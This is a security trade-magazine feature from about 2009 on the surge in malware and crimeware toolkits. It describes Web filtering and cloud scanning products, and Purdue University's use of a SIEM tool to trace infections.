​

MALWARE HAS BEEN GROWING in recent years; 2008 saw that trend continue at an accelerated pace, with some vendors reporting more new infections than they had seen in their entire histories.

Part of this surge is attributable to hackers making off-the-shelf versions available to anyone for a price. Another concern is the way that the malware is spread. Whereas such tools used to be delivered mainly via e-mail attachment, they’re now increasingly spread via Web sites. IBM reported that the number of new malicious Web links increased 508 percent in the first half of 2009 compared to the first half of 2008.

Malware is also becoming much harder to detect. For years, hackers employed masking techniques to evade antivirus (AV) detection, but newer methods have become increasingly sophisticated. For example, much modern malware now changes dynamically, consisting of some strains that change each time the Web site is visited.

To fight this ever-shifting threat, organizations need a “cocktail” of solutions, says Forrester analyst Chenxi Wang.

One malware-fighting ingredient that shows promise, she says, is Web filtering. Filtering combines behavioral, reputation-based, and other technologies to detect Web page and e-mail-borne malicious code in real time.

Another part of the cocktail could consist of security information and event management (SIEM) tools. Many organizations are completely unaware that they have multiple infected machines. Finding infections can involve arduous sifting through mountains of data layers. SIEM solutions can help pinpoint and eradicate even the most sophisticated infections.

Following is an overview of the crimeware explosion, a look at advances in Web filtering, and an example of how one university is using a SIEM tool to help eradicate hard to find malware once it has infected a network.

Growing Menace

PandaLabs, the research lab of Spain-based Panda Security, identified about 35,000 new pieces of malware each day in 2008, for an annual total of about 15 million new strains. This annual figure surpassed beginning-of-the-year estimates by 5 million. It was also so high that in the year’s first eight months, the company had detected more strains than it had in the first 17 years of its existence.

Trojans were the most common type of malware found; this type of malware is designed to steal information, install backdoors, and delete or encrypt files and other data. They represented about 70 percent of the total. They were followed by adware, representing about 20 percent, and worms, which made up about 4 percent of the mix. These three variants constituted about 94 percent of infections.

Much of this growth has to do with the increasingly widespread availability of toolkits, according to Panda. Designed by professional hackers, the kits can be used by people with few computer skills.

Toolkits are currently used mainly to infect Web sites, says Forrester’s Wang. That may explain why there has been tremendous growth in the number of infected Web pages in the past year.

The number of crimeware-infected sites increased 827 percent from January to December 2008, according to the Anti-Phishing Working Group, a coalition of industry and law enforcement agencies aligned against malware.

Toolkit Trojans are often designed to receive updates. Users can frequently choose among multiple functions, and the kits can often be remotely controlled to receive future instructions, according to PandaLabs. One toolkit that Panda found late last year, which the company called BitTera.C, could spread infection via e-mail or Web page. It offered dozens of boxes that users could check to switch on functions, such as online and offline keyloggers, for instance.

The toolkit users could choose to disable parts of a victim’s computer, such as the registry, task manager, system recovery, firewall, other security programs, and automatic updates. It was easy to use, according to a Panda post it could “construct the malware you want in minutes.”

After infecting victims’ machines, the Trojans send information back to servers. Security vendor Finjan of Israel has discovered 10 times the volume of stolen information in the early part of 2009 compared to the same period in 2008, according to Yuval Ben-Itzhak, the company’s chief technology officer. He says he sees no slowdown ahead. With the slumping economy, it’s likely that toolkit manufacturing and demand will both rise.

Malware is also becoming much harder to detect. AV companies typically analyze a suspect piece of malware to assess its signature. They then push out an antimalware update designed to detect and block programs with that signature.

One way hackers have evaded these defenses is by encrypting the malicious part of malware’s code, according to Ben-Itzhak. More recently, though, hackers have concealed malware with “dynamic code obfuscation,” which can involve randomly modifying a piece of the malware’s function name and also varying its encryption keys.

With BitTera.C, purchasers can customize the way the Trojan masks itself, choosing to add encryption and polymorphism, for example. These kinds of dynamic changes can make malware appear different each time someone visits a Web site, making meaningful signatures difficult to establish.

Smart Detection

There’s no single way to beat today’s malware threats, but Web filtering tools are proffering smarter detection technology to stop malware from passing through an organization’s perimeter.

One leader in this space has been Finjan, according to Peter Christy, a principal at the Los Altos, California-based Internet Research Group.

Finjan’s patented behavior-based, real-time scanning technology examines code inside a Web page before it executes. It deconstructs the code and matches it against existing models. It analyzes the behavior of the program, including looking at the executables it wants to run, and then makes an intelligent decision, says Christy.

Most behavior-based technology examines malware later on, as it’s executing, says Ben-Itzhak, “but this can be dangerous.” Finjan recently updated its product to examine Adobe’s PDF files and Flash Player, both of which have been big recent malware targets.

In the cloud. Some vendors have started offering in-the-cloud Web filtering solutions with real-time code scanning. Such products act like a Web proxy; the vendors’ servers intercept an organization’s Web traffic. The solutions can create additional efficiencies and generate more layers of intelligent scanning, says Wang. She acknowledges, however, that since such solutions are new, they may have some yet-undiscovered risks of their own.

Trend Micro was the first major antimalware vendor to offer such services last year. The company’s Smart Protection Network examines Web, e-mail, and file data and compares it to constantly updated, in-the-cloud threat databases. Malicious content is stopped before it can enter a company’s network.

This service includes reputation scanning: Web domains are given a score based on a site’s age, historical location, and past malware activities. With e-mail, IP addresses are validated in real time against a reputation database of known spam sources.

Trend Micro’s network also uses real-time behavior-based technology to detect malware. An additional protective layer consists of a feedback loop, continually exchanging information between Trend Micro’s customers and its databases.

Network Intel

Once malware has entered an organization, it can be extremely difficult to detect. Some analysts say IT managers need a more intelligent view of suspicious behavior happening in their systems and machines.

Companies need technology “to provide the air cover by ensuring that applications and networks don’t have vulnerabilities and are not behaving abnormally or transmitting data that they shouldn’t,” explains Forrester senior security analyst Khalid Kark in a report. SIEM tools are now being touted as a way to achieve this comprehensive view.

Higher Learning

About three years ago, The IT department at Purdue University in West Lafayette, Indiana, wanted a better way to review the institution’s gigabytes of log data. At the time, there was no feasible way for IT staff to search the logs for malicious activity, according to Scott Ksander, IT networks and security executive director. Consequently, the staff was forced to be reactive, and the ongoing effort to eradicate infections on machines across campus was like putting out brush fires.

Ksander wanted to better understand how the attacks had succeeded so that he could tighten the university’s perimeter defenses. He also wanted a way to see when malware, which typically selfspreads, started to infect the systems, and he wanted to see how it worked.

Initially, he and his staff made some homegrown tools, which involved using scripting and “digging out” a lot of data, he says. The information that he wanted to correlate came from several major sources, including the university’s main anti-malware vendor, Santa Clara, California-based McAfee; internal e-mail logs; and logs from Cisco Systems of San Jose, California, on net flow data, depicting which machines were using which ports to connect to which sites.

The in-house tools had a primitive ability to correlate data, he says, but required considerable “care and feeding.”

Last year, Ksander started looking at SIEM tools. He wanted a way to correlate his numerous log streams into a single database, which could be viewed from one console. He chose QRadar, a tool from Q1 Labs, of Waltham, Massachusetts, he says, partly because he was able to get good pricing. The program integrates log management, network behavior analytics, and security event management.

Personalization. The most time-consuming part of setting up the tool was configuration, says Ksander. Much of this work involved filling in form fields based on his organization’s sources of data. In setting up the process, he learned from mistakes he had made with his prior in-house tools, he says.

This implementation took about a month, with one staffer working almost full-time and two others advising on a part-time basis.

Consolidated view. Now that the SIEM solution is operational, IT is able to look at data to learn about discovered and potential infections with just a few keystrokes, says Ksander. Before SIEM, “it was a little like trying to find Web information before Google.”

The tool’s forensic capabilities are critical, Ksander says. If he learns about a malware infection, he can use the tool to examine its behavior.

A lot of the correlation concerns timing, he says. He can examine when an infection occurred and then look at how a machine’s behavior, such as the ports it was connecting through, changed before and after an infection.

By learning about port and site connectivity, the IT staff gets the information it needs to assess how to tighten the university’s network defenses. Ksander says that he adjusts the school’s intrusion prevention system (IPS) constantly, as he gets new information. He can tweak the IPS to allow or disallow certain connections or activities across a network.

Another valuable aspect of the SIEM tool is that it can help IT assess whether malware was the result of an outside attack or whether it might have been planted from within. If the evidence points to an inside job, IT can call up access logs, which are also fed into QRadar.

Although QRadar can be set to produce alerts, Ksander also recognizes that the human factor is still key. He notes that some of his most valuable tips come from university computer users. They tend to be the first to notice many infections, he says, especially the worst ones.

With that in mind, his department has placed a growing emphasis on good reporting mechanisms in the past few years, Ksander says. For example, he has put a large icon on the IT department’s Web site that users can click on to report suspicious behavior.

“It can be something as simple as ‘my machine is acting weird,’” explains Ksander. After such alerts, the staff can then use the SIEM solution to get a handle on any malware’s behavior, timing, and degree of spread.

Although Purdue had only been using the SIEM program for a few months when Ksander was interviewed for this article, his sense was that it requires considerably less ongoing maintenance than the previous tools.

He finds that it is both effective and somewhat satisfying to use. He likens it to detective work, noting, “There’s a CSI [Crime Scene Investigation] feel to it.”

Ksander’s experience illustrates how companies are learning to combat the ballooning malware threat. They will, however, have to remain ready to adjust their tactics as the hackers think of new modes of attack.

John Wagley is an associate editor at Security Management.